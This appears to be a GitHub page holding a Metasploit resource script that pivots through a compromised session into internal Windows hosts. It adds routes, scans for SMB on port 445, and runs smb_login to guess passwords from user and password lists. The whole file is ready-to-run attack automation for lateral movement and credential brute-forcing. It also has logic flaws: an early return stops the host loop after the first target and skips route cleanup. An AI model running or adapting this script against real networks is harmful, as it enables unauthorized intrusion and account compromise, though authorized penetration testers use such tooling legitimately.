Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
118 lines (95 sloc) 2.97 KB
# checkpass.rc
# 1. routes through a session
# 2. runs smb_login through the session if 445 is open
# OPTIONS as framework environment variables (setg)
# Required options
# RHOST_FILE - target host file, one per line
# SESSION - session to run through
# PASS_FILE - password file
# USER_FILE - user file
<ruby>
hfile = open(framework.datastore['RHOST_FILE'], "r")
hfile.each_line do |rhost|
rhost = rhost.strip
if rhost.start_with?("#")
next
end
print_line("#####################")
print_line("# Beginning #{rhost}")
print_line("#####################")
time_stamp = ::Time.now.strftime('%Y%m%d:%H%M%S')
if (rhost == nil)
print_error("ERROR: must set RHOST")
end
ip = 0
print_line("#####################")
print_line("# Routing through Session #{framework.datastore['SESSION']}")
print_line("#####################")
run_single("route flush")
if (framework.datastore['NETMASK'] == nil)
run_single("use post/windows/recon/resolve_hostname")
run_single("set SESSION #{framework.datastore['SESSION']}")
run_single("set HOSTNAME #{rhost}")
run_single("run")
framework.db.hosts.each do |h|
begin
if (h.name.chomp == rhost.chomp)
ip = h.address
end
rescue
next
end
end
else
ip = framework.datastore['SUBNET']
end
if (ip == 0)
print_error "Session or host might be invalid. Exiting"
return
end
run_single("use post/windows/manage/autoroute")
#set broad netmask - we'll delete in a minute
run_single("set NETMASK 255.0.0.0")
run_single("set SUBNET #{ip}")
run_single("run")
print_line("#####################")
print_line("# PORTSCANNING #{rhost}")
print_line("#####################")
run_single("use auxiliary/scanner/portscan/tcp")
run_single("set RHOSTS #{ip}")
#check for remote powershell, smb
run_single("set PORTS 445")
run_single("run")
#first try remote powershell, then smb
tport = nil
framework.db.hosts.each do |h|
if (h.name == rhost)
puts h.name
h.services.each do |s|
if (s.port == 445)
print_line "SMB is enabled. Continuing"
tport = s.port
end
end
end
end
if tport != 445
print_error("port 445 was not enabled, exiting")
return
end
print_line("#####################")
print_line("# Running smb_login")
print_line("#####################")
run_single("use auxiliary/scanner/smb/smb_login")
run_single("set RHOSTS #{ip}")
run_single("set BLANK_PASSWORDS false")
run_single("set STOP_ON_SUCCESS true")
run_single("set USER_AS_PASS false")
run_single("run")
return
end
print_line("#####################")
print_line("# Cleaning up: Resetting routes")
print_line("#####################")
run_single("route flush")
</ruby>